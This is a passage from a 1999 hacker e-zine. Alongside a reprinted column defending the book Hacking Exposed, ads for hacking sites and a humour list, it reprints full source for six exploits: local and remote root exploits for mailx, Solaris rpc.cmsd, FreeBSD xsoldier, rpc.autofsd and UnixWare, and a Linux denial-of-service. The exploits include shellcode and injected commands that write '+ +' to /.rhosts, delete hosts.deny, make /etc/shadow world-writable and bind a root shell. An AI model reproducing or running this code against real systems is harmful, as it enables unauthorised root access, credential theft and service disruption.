http://www.sans.org/sf99/sf99.htm
Extranet Security
M-W, Dec. 13-15 San Francisco, Calif.
http://www.unex.berkeley.edu/eng
=====================================================
4. SECURITY PERSPECTIVES
*EXPOSING HACKING WITH HACKING EXPOSED
By Ben Rothke
Do books about hacking create more hackers? Is corporate
America at risk due to such titles?
Many people in the computer industry feel that such
dissemination of information is a sure way to increase
computer malevolence. The question has been re-ignited
with the publication of Hacking Exposed: Network Security
Secrets and Solutions, by Stuart McClure, Joel Scambray
and George Kurtz, all formerly with Ernst & Young's
e-security group. Are such titles simply cookbooks for
those attempting to perform computer crimes? The
knee-jerk answer might be yes, but in reality, the answer
is a clear no.
As an example, will the reader of Adventures in the
Kitchen by Wolfgang Puck emerge as a gourmet chef, or
will the reader of Dr. Atkins's New Diet Revolution lose
weight by reading the book? While the written word is
powerful, and Hacking Exposed is indeed a powerful book,
there is no way for a book to instantaneously turn a
novice into a dangerous hacker.
While a preponderance of corporate systems are indeed
insecure, it is irresponsible and capricious to think
that the mere appearance of a book such as Hacking
Exposed will create a landslide of hacker activity. Such
an allegation is simply an attempt to transfer corporate
America's apathy towards information security, and apply
a quick blame to a much larger problem.
Anyone who views hacking as an exercise in reading a
book does not understand hacking, nor the nature of
securing computer systems. True, the book lists tools and
exercises that will make a hacking exercise easier. But
to perform a real hack is something that takes more than
the book has to offer. The authors state something to the
effect of, "hacking root is a state of mind." With such a
mantra, the true hacker will know that running a few
handy tools or scripts will only provide them with a
start to their hacking endeavor. When the tools fail,
where will they go on? If not their own fortitude, their
own quest for root, a quest that can not be found in any
book, then the hacking attempt will quickly end there.
Want to know a secret? Contrary to the movies and CNN
reports, hacking is a pretty boring exercise. Just as a
novice hunter will tire after a short while, so too will
a script kiddie wear down easily. For the novice hacker,
the appearance of a book about hacking will neither help
nor hinder his aspirations. Traversing through networks,
servers and myriad hosts is tedious at best for the
greenhorn. It is only the media and uninitiated who
attempt to glamorize such activities.
Hacking Exposed is an important title for those who are
interested in securing their systems, and know what the
innumerable vulnerabilities within their systems are.
Will such a title unleash a new wave of hackers? No.
Ben Rothke (brothke@ebnetworks.com) is a network
security consultant with eB Networks Inc.
=====================================================
ADVERTISEMENT
ICSA.net announces a free Webcast, "An Overview of
Intrusion Detection Technologies," to air on Dec. 9,
1999. This one-hour seminar will explain intrusion
detection and vulnerability assessment in clear terms, as
well as announce the new ICSA Intrusion Detection Buyers'
Guide, an online resource for decision-makers. For
details, visit http://www.icsa.net.
=====================================================
Security Wire Digest and Information Security magazine
are published by ICSA.net, the world's leader in Internet
Security services.
Copyright (c) 1999. All rights reserved. No portion of
this newsletter may be redistributed or republished in
any format without the express consent of the publisher.
=====================================================
To SUBSCRIBE to Security Wire Digest, go to:
http://www.infosecuritymag.com/newsletter
To UNSUBSCRIBE to Security Wire Digest, go to:
http://custserv.emailch.com/removeme/unsub.cfm?j=11887&e=jericho@dimensional.com
To CHANGE your e-mail address, go to:
http://polaris.emailch.com/infosecurity/questionnaire.cfm?e=jericho@dimensional.com
.. email integration by EmailChannel, Inc.
For more information, send email to info@emailch.com
or please visit http://www.emailch.com
ISN is sponsored by Security-Focus.COM
@HWA
38.0 mailx.c slackware 3.6 local exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
I dunno if this is an old overflow or (it probably is...) but I was just
messing with the Slackware 3.6 source and found it.
Here's some basic notes on what happens:
$HOME environment dir contains exploit.
Exploit buffer size = 1024 + 8
tinit() is called first. This gets the homedir variable from cp which is a
value returned by getenv("HOME");
load() is called next, taking as an argument an expended "~/.mailrc".
expand():
if (name[0] == '~' && (name[1] == '/' || name[1] == '\0')) {
sprintf(xname, "%s%s", homedir, name + 1);
xname size = 1024
homedir == getenv("HOME")
name == "~/.mailrc"
"~/.mailrc" is at end of the buffer, so this should just be pushed over
the stack and forgotten about.
*/
/*
* mailx buffer overflow
*
*/
#include <stdio.h>
#include <stdlib.h>
#define BSIZE (1024)
#define OSIZE (8)
#define ESIZE (BSIZE + OSIZE)
#define NOP (0x90)
#define OFFSET (0)
char hellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
long get_esp (void)
{
__asm__ ("movl %esp, %eax");
}
int main (int argc, char * * argv)
{
char * evil;
int i, j;
long addr;
int offset = OFFSET;
evil = (char *)malloc(ESIZE);
for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
evil[i] = NOP;
for (j = 0; i < (ESIZE - 4); ++i, ++j)
evil[i] = hellcode[j];
if (argc > 1) offset = atoi(argv[1]);
addr = (get_esp() - offset);
*(long *)(evil + i) = addr;
setenv("HOME", evil, 1);
fprintf(stderr, "\nmailx-8.1.1 exploit\n");
fprintf(stderr, "Using address 0x%x, offset %d\n\n", addr, offset);
execl("/usr/bin/mail", "mail", NULL);
}
/* www.hack.co.za */
@HWA
39.0 cmsdex.c Solaris (2.6 / 7.0) remote exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* cmsdex - i386 Solaris remote root exploit for /usr/dt/bin/rpc.cmsd
*
* Tested and confirmed under Solaris 2.6 and 7.0 (i386)
*
* Usage: % cmsdex -h hostname -c command -s sp -o offset
*
* where hostname is the hostname of the machine running the vulnerable
* CDE calendar service, command is the command to run as root on the
* vulnerable machine, sp is the %esp stack pointer value, and offset
* is the number of bytes to add to sp to calculate your target %eip
* (try -1000 to 1000 in increments of 10 or so for starters once you
* have a good guess at the stack pointer).
*
* When specifying a command, be sure to pass it to the exploit as a
* single argument, namely enclose the command string in quotes if it
* contains spaces or other special shell delimiter characters. The
* command string must not be longer than 100 bytes. The exploit will
* pass this string without modification to /bin/sh -c on the remote
* machine, so any normally allowed Bourne shell syntax is also allowed
* in the command string. Due to the nature of the exploit, the command
* string must not contain any @ characters.
*
* Demonstration values for i386 Solaris:
*
* (2.6) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x0804748c -o 0
* (7.0) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x08047378 -o 0
*
* June 4, 1999
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define EGGLEN 1036
#define JUGULAR 1024
#define NOP 0x90
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard */
/* syscall: */
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */
/* 9 */ "\xc3" /* ret */
/* start: */
/* 10 */ "\x5e" /* popl %esi */
/* 11 */ "\x31\xc0" /* xor %eax,%eax */
/* 13 */ "\x89\x46\xbf" /* movl %eax,-0x41(%esi) */
/* 16 */ "\x88\x46\xc4" /* movb %al,-0x3c(%esi) */
/* 19 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */
/* 22 */ "\x88\x46\x17" /* movb %al,0x17(%esi) */
/* 25 */ "\x88\x46\x1a" /* movb %al,0x1a(%esi) */
/* 28 */ "\x88\x46\xff" /* movb %al,0x??(%esi) */
/* execve: */
/* 31 */ "\x31\xc0" /* xor %eax,%eax */
/* 33 */ "\x50" /* pushl %eax */
/* 34 */ "\x56" /* pushl %esi */
/* 35 */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
/* 38 */ "\x89\x1e" /* movl %ebx,(%esi) */
/* 40 */ "\x53" /* pushl %ebx */
/* 41 */ "\x8d\x5e\x18" /* leal 0x18(%esi),%ebx */
/* 44 */ "\x89\x5e\x04" /* movl %ebx,0x4(%esi) */
/* 47 */ "\x8d\x5e\x1b" /* leal 0x1b(%esi),%ebx */
/* 50 */ "\x89\x5e\x08" /* movl %ebx,0x8(%esi) */
/* 53 */ "\xb0\x3b" /* movb $0x3b,%al */
/* 55 */ "\xe8\xc6\xff\xff\xff" /* call syscall */
/* 60 */ "\x83\xc4\x0c" /* addl $0xc,%esp */
/* springboard: */
/* 63 */ "\xe8\xc6\xff\xff\xff" /* call start */
/* data: */
/* 68 */ "\xff\xff\xff\xff" /* DATA */
/* 72 */ "\xff\xff\xff\xff" /* DATA */
/* 76 */ "\xff\xff\xff\xff" /* DATA */
/* 80 */ "\xff\xff\xff\xff" /* DATA */
/* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */
/* 92 */ "\x2d\x63\xff"; /* DATA */
extern char *optarg;
struct cm_send {
char *s1;
char *s2;
};
struct cm_reply {
int i;
};
bool_t
xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
if (!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if (!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t
xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
if (!xdr_int(xdrs, &objp->i))
return (FALSE);
return (TRUE);
}
int
main(int argc, char *argv[])
{
int c, slen, clen;
char *program, *hostname, *command, egg[EGGLEN+1], *eggp;
unsigned long int sp = 0, addr, alen = 16;
long int offset = 0;
CLIENT *cl;
struct cm_send send;
struct cm_reply reply;
struct timeval tm = { 10, 0 };
enum clnt_stat stat;
program = argv[0];
hostname = "localhost";
command = "chmod 666 /etc/shadow";
while ((c = getopt(argc, argv, "h:c:s:o:a:")) != EOF) {
switch (c) {
case 'h':
hostname = optarg;
break;
case 'c':
command = optarg;
break;
case 's':
sp = strtoul(optarg, NULL, 0);
break;
case 'o':
offset = strtol(optarg, NULL, 0);
break;
case 'a':
alen = strtoul(optarg, NULL, 0);
break;
case '?':
default:
printf("usage: %s -h hostname -c command -s sp -o offset\n",
program);
exit(1);
break;
}
}
slen = strlen(shell);
clen = strlen(command);
if (clen > 100) {
printf("exploit failed; command string too long "
"(must not exceed 100 characters)\n");
exit(1);
}
shell[30] = (char) (clen + 27);
memset(egg, NOP, EGGLEN);
eggp = egg + EGGLEN - alen - 1 - clen - slen;
memcpy(eggp, shell, slen); eggp += slen;
memcpy(eggp, command, clen); eggp += clen;
*eggp++ = '\xff'; addr = sp + offset;
while (eggp <= egg + EGGLEN - 4) {
*eggp++ = (addr >> 0) & 0xff;
*eggp++ = (addr >> 8) & 0xff;
*eggp++ = (addr >> 16) & 0xff;
*eggp++ = (addr >> 24) & 0xff;
}
egg[JUGULAR] = '\xff'; egg[EGGLEN] = '\0';
send.s1 = egg; send.s2 = "";
cl = clnt_create(hostname, CMSD_PROG, CMSD_VERS, "udp");
if (cl == NULL) {
clnt_pcreateerror("clnt_create");
printf("exploit failed; unable to contact RPC server\n");
exit(1);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
stat = clnt_call(cl, CMSD_PROC, xdr_cm_send, (caddr_t) &send,
xdr_cm_reply, (caddr_t) &reply, tm);
if (stat == RPC_SUCCESS) {
printf("exploit failed; RPC succeeded and returned %d\n", reply.i);
clnt_destroy(cl);
exit(1);
} else {
clnt_perror(cl, "clnt_call");
printf("exploit probably worked; RPC failure was expected\n");
clnt_destroy(cl);
exit(0);
}
}
/* www.hack.co.za */
@HWA
40.0 xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/sh
* Brock Tellier btellier@usa.net
*/
#include <stdio.h>
char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"
void buildui() {
FILE *fp;
char cc[100];
fp = fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
system(cc);
}
main (int argc, char *argv[] ) {
int x = 0;
int y = 0;
int offset = 0;
int bsize = 4400;
char buf[bsize];
int eip = 0xbfbfdb65; /* works for me */
buildui();
if (argv[1]) {
offset = atoi(argv[1]);
eip = eip + offset;
}
fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\n");
fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
for ( x = 0; x < 4325; x++) buf[x] = 0x90;
fprintf(stderr, "NOPs to %d\n", x);
for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
fprintf(stderr, "Shellcode to %d\n",x);
buf[x++] = eip & 0x000000ff;
buf[x++] = (eip & 0x0000ff00) >> 8;
buf[x++] = (eip & 0x00ff0000) >> 16;
buf[x++] = (eip & 0xff000000) >> 24;
fprintf(stderr, "eip to %d\n",x);
buf[bsize]='\0';
execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
}
/* www.hack.co.za */
@HWA
41.0 rpc.autofsd.c FreeBSD/misc remote exploit by guidob.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// *** Synnergy Networks
// * Description:
//
// Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
// on tcp port 530.
// * Author:
//
// guidob (guidob@synnergy.net)
// Synnergy Networks (c) 1999, http://www.synnergy.net
// * Greets:
//
// Synnergy Networks, LoU, Cindy
// * Comments:
//
// This will not work on all types and/or versions.
// *** Synnergy Networks
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <signal.h>
#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)
#define AT 8
#define A_MAXNAME 255
#define A_MAXOPTS 255
#define A_MAXPATH 1024
struct mntrequest {
char *name; /* name to be looked up */
char *map; /* map to use */
char *opts; /* default options */
char *path; /* mountpoint to use */
};
struct mntres {
int status; /* 0=OK, otherwise an errno from <sys/errno.h> */
};
bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
return (TRUE);
}
void signal_handler(void) {
exit(0);
}
bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
if (!xdr_int(xdrs, &objp->status)) return (FALSE);
return (TRUE);
}
main(int argc, char **argv){
CLIENT *cl;
struct mntrequest mntreq;
struct mntres *res;
struct sockaddr_in target;
struct hostent *hp;
struct timeval tm;
char *host;
enum clnt_stat stat;
int sd;
signal(SIGALRM, signal_handler);
alarm(AT);
host=argv[1];
if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
printf("%s: cannot resolve\n", host);
exit(1);
} else
target.sin_addr.s_addr = *(u_long *)hp->h_addr;
}
target.sin_family=AF_INET;
target.sin_port=0;
sd=RPC_ANYSOCK;
tm.tv_sec=8;
tm.tv_usec=0;
if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
tm.tv_sec = 25;
/* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
*/
mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* Tu mozna wstawic co sie chce */
mntreq.map="/bin/true";
mntreq.path="/hosts";
mntreq.opts="";
bzero((char *)&res, sizeof(res));
if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq,
(xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
exit(1);
}
clnt_destroy(cl);
}
// EOF
@HWA
42.0 iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Exploit option length missing checks in:
Debian Linux 2.1
RedHat Linux 5.2
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0
Andrea Arcangeli <andrea@suse.de>
*/
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
main()
{
int sk;
struct sockaddr_in sin;
struct hostent * hostent;
#define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr))
#define OPT_SIZE 1
char payload[PAYLOAD_SIZE];
sk = socket(AF_INET, SOCK_DGRAM, 0);
if (sk < 0)
perror("socket"), exit(1);
if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0)
perror("setsockopt"), exit(1);
bzero((char *)&sin, sizeof(sin));
sin.sin_port = htons(0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(2130706433);
if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0)
perror("connect"), exit(1);
if (write(sk, payload, PAYLOAD_SIZE) < 0)
perror("write"), exit(1);
}
/* www.hack.co.za */
@HWA
43.0 truck.c UnixWare 7.1 local explot by Brock Tellier.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/**
** "Its a hole you could drive a truck through."
** -Aleph One
**
** truck.c UnixWare 7.1 security model exploit
** Demonstrates how we own privileged processes
**
** Usage: cc -o truck truck.c
** ./truck <filetype> where filetype is 1, 2 or 3
** (for dacread, dacwrite and setuid, respectively)
**
** This will put $XNEC in the environment and run a shell.
** From there you must use gdb/debug to load a file of the
** type you chose (by checking /etc/security/tcb/privs)
** and setting a breakpoint at _init via "break _init".
** When you "run" and break at _init, change your EIP
** to something between 0x8046000 and 0x8048000 with
** "set $eip = 0x8046b75" and "continue" twice.
**
**
** Brock Tellier btellier@usa.net
**/
#include <stdlib.h>
#include <stdio.h>
char scoshell[]= /* This isn't a buffer overflow! really! */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define LEN 3500
#define NOP 0x90
#define DACWRITE "void main() { system(\"echo + + > /.rhosts; chmod 700 \
/.rhosts; chown root:sys /.rhosts; rsh -l root localhost sh -i \
\"); }\n"
#define DACREAD "void main() { system(\"cat /etc/shadow\");}\n"
#define SETUID "void main() { setreuid(0,0);system(\"/bin/sh\"); }\n"
void usage(int ftype) {
fprintf(stderr, "Error: Usage: truck [filetype]\n");
fprintf(stderr, "Where filetype is one of the following: \n");
fprintf(stderr, "1 dacread\n2 dacwrite\n3 setuid\n");
fprintf(stderr, "Note: if file has allprivs, use setuid\n");
}
void buildsm(int ftype) {
FILE *fp;
char cc[100];
fp = fopen("/tmp/sm.c", "w");
if (ftype == 1) fprintf(fp, DACREAD);
else if(ftype == 2) fprintf(fp, DACWRITE);
else if(ftype == 3) fprintf(fp, SETUID);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c");
system(cc);
}
int main(int argc, char *argv[]) {
int i;
int buflen = LEN;
char buf[LEN];
int filetype = 0;
char filebuf[20];
if(argc > 2 || argc == 1) {
usage(filetype);
exit(0);
}
if ( argc > 1 ) filetype=atoi(argv[1]);
if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); }
buildsm(filetype);
fprintf(stderr, "\nUnixWare 7.1 security model exploit\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
memset(buf,NOP,buflen);
memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
memcpy(buf, "XNEC=", 5);
putenv(buf);
buf[buflen - 1] = 0;
system("/bin/sh");
exit(0);
}
/* www.hack.co.za */
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
0
0
0
o
O O O
0
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ _ _
/\ | | | | (_) (_)
/ \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _
/ /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
/ ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| |
/_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, |
__/ |
|___/
ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE
http://revenger.hypermart.net
±±± ±±±±± ± ± ±±±±±±± ±± ± ±±±±±± ±±±±± ±±±
± ± ± ± ± ± ± ± ± ± ± ± ± ± ±
± ± ± ± ± ± ± ± ± ± ± ±± ± ± ±
±± ±±± ± ± ±±±±±±± ± ± ± ± ±±± ±±
± ± ± ± ± ± ± ± ± ± ±±± ± ± ±
± ± ± ± ± ± ± ± ± ± ± ± ± ±
± ± ±±±±± ± ±±±±±±± ± ±± ±±± ±±±±± ± ± 's
T E X T Z F I L E HOMEPAGE
http://revenger.hypermart.net
Here you may find up to 340 text files for:
ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS ,
UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC ,
PHREAKING , BOOKS AND A-S FILES AVAILABLE!
http://revenger.hypermart.net
Visit Us Now !
.
.
............... .
: : . . . . . .
__:________ : : ___________ . . .
\ < /_____:___ : ( < __( :_______
) : )______:___\_ (___( : /
=====/________|_________/ < | : (________________(======
: (__________________) :wd!
. : : :
- / - w w w . h a c k u n l i m i t e d . c o m - / -
: . . . . . : :
. . . . . :...............:
.
.
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
When people ask you "Who is Kevin Mitnick?" do you have an answer?
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
http://www.2600.com/ http://www.kevinmitnick.com
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* http://www.csoft.net" One of our sponsers, visit them now www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
// or cruciphux@dok.org //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...<sic>
Submitted by Deflux, check out his site at http://www.advdata.net/~deflux/
Define your terms for software releases:
Advanced User: A person who has managed to remove a computer from its
packing materials.
Power User: A person who has mastered the brightness and contrast controls
on any computer monitor.
American Made: Assembled in America from parts made abroad.
Alpha Test Version: Too buggy to be released to the paying public.
Beta Test Version: Still too buggy to be released.
Release Version: Alternate pronunciation of "Beta Test Version".
Sales Manager: Last week's new sales associate.
Consultant: A former sales associate who has mastered at least one tenth
of the dBase III Plus Manual.
Systems Integrator: A former consultant who understands the term AUTOEXEC.BAT.
AUTOEXEC.BAT: A sturdy aluminum or wooden shaft used to coax AT hard disks into
performing properly.
Backup: The duplicate copy of crucial data that no one bothered to make;
used only in the abstract.
Clone: One of the many advanced-technology computers IBM is beginning to
wish it had built.
Convertible: Transformable from a second-rate computer to a first-rate
doorstop or paperweight. (Replaces the term "junior".)
Copy Protection: A clever method of preventing incompetent pirates from
stealing software and legitimate customers from using it.
Database Manager: A program that allows users to manipulate data in every
conceivable way except the absolutely essential way they
conceive of the day after entering 20 megabytes of raw data.
EMS: Emergency Medical Service; often summoned in cases of apoplexy induced
by attempts to understand extended, expanded, or enhanced memory specs.
Encryption: A powerful algorithmic encoding technique employed in the creation
of computer manuals.
FCC-Certified: Guaranteed not to interfere with radio or television reception
until you add the cable that is required to make it work.
Hard Disk: A device that allows users to delete vast quantities of data with
simple mnemonic commands.
Integrated Software: A single product that deftly performs hundreds of
functions that the user never needs and awkwardly
performs the half-dozen he uses constantly.
Laptop: Smaller and lighter than the average breadbox.
Multitasking: A clever method of simultaneously slowing down the multitude
of computer programs that insist on running too fast.
Network: An electronic means of allowing more than one person at a time to
corrupt, trash, and otherwise cause permanent damage to useful
information.
Portable: Smaller and lighter than the average refrigerator.
Support: The mailing of advertising literature to customers who have returned
a registration card.
Transportability: Neither chained to a wall or attached to an alarm system.
Printer: An electromechnical paper shredding device.
Spreadsheet: A program that gives the user quick and easy access to a wide
variety of highly detailed reports based on highly inaccurate
assumptions.
Thought Processor: An electronic version of the intended outline procedure
that thinking people instantly abandon upon graduation
from high school.
Upgraded: Didn't work the first time.
User Friendly: Supplied with a full color manual.
Very User Friendly: Supplied with a disk and audiotape so the user need
not bother with the full color manual.
Version 1.0: Buggier than Maine in June; eats data.
Version 1.1: Eats data only occasionally; upgrade is free, to avoid litigation
by disgruntled users of Version 1.0.
Version 2.0: The version originally planned as the first release, except for
a couple of data-eating bugs that just won't seem to go away;
no free upgrades or the company would go bankrupt.
Version 3.0: The revision in the works when the company goes bankrupt.
Videotex: A moribund electronic service offering people the privelege of
paying to read the weather on their television screens instead
of having Willard Scott read it to them free while they
brush their teeth.
Warranty: Disclaimer.
Workstation: A computer or terminal slavishly linked to a mainframe that does
not offer game programs.
(The previous list of terms was furnished by copied from the
Government Computer News, November 21, 1988 issue. The
original data was provided by the WIC Connection.)
SITE.1
http://www.temporal.org/thescene/pics/
Wonder who's behind the nick on IRC? or in the scene? check this link out
to see some of the more well known people from around irc etc...
http://www.hack.co.za/
By: Gov-Boi
Recently updated, looks clean, some graphics, not a bad layout, no more text
only. always a good site for recent exploits, give it a visit.
http://hhp.perlx.com/
By: Loophole
Very nice and well done site by an oldschool ninja... can be found on irc
but don't harass him or he'll get medeival on your ass!...you can find
exploits, advisories and the like here, its a work in progress, brand
new site. Looks promising! - Ed
http://www.scriptkiddies.org/
Well it had to happen, they even have merchandizing, check it out, more
news, tech and otherwise, scene gossip, tips and articles. can u dig it?
Note: new site, some stuff isn't setup yet but should be soon...at least
it looks sweet. - Ed
You can Send in submissions for this section too if you've found
(or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
___| _ \ |
| __| _` |\ \ / | | __| _ \ _` |
| | ( | ` < | | | __/ ( |
\____|_| \__,_| _/\_\\___/ _| \___|\__,_|
